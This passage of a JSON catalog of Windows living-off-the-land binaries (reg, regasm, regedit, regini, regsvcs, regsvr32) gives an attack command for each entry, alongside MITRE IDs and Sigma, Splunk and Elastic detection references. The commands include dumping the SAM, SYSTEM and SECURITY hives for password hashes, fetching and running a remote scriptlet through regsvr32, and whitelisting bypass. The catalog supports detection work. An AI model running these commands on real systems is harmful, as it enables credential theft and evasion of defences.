use","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"]},{"id":"lolbas:reg-exe:1","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"reg save HKLM\\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\\SAM {PATH_ABSOLUTE:.3.bak}","description":"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material","usecase":"Dump credentials from the Security Account Manager (SAM)","mitre":["T1003.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"]},{"id":"lolbas:regasm-exe:0","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regasm.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"]},{"id":"lolbas:regasm-exe:1","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regasm.exe /U {PATH:.dll}","description":"Loads the target .DLL file and executes the UnRegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"]},{"id":"lolbas:regedit-exe:0","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey","description":"Export the target Registry key to the specified .REG file.","usecase":"Hide registry data in alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"]},{"id":"lolbas:regedit-exe:1","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit {PATH_ABSOLUTE}:regfile.reg","description":"Import the target .REG file into the Registry.","usecase":"Import hidden registry data from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"]},{"id":"lolbas:regini-exe:0","toolId":"lolbas:regini-exe","toolName":"Regini.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regini.exe {PATH}:hidden.ini","description":"Write registry keys from data inside the Alternate data stream.","usecase":"Write to registry","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml"},{"type":"IOC","value":"regini.exe reading from ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regini/"]},{"id":"lolbas:register-cimprovider-exe:0","toolId":"lolbas:register-cimprovider-exe","toolName":"Register-cimprovider.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Register-cimprovider -path {PATH_ABSOLUTE:.dll}","description":"Load the target .DLL.","usecase":"Execute code within dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"},{"type":"IOC","value":"Register-cimprovider.exe execution and cmdline DLL load may be supsicious"}],"references":["https://twitter.com/PhilipTsukerman/status/992021361106268161","https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"]},{"id":"lolbas:regsvcs-exe:0","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"]},{"id":"lolbas:regsvcs-exe:1","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"]},{"id":"lolbas:regsvr32-exe:0","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:1","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:2","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:3","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:4","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - 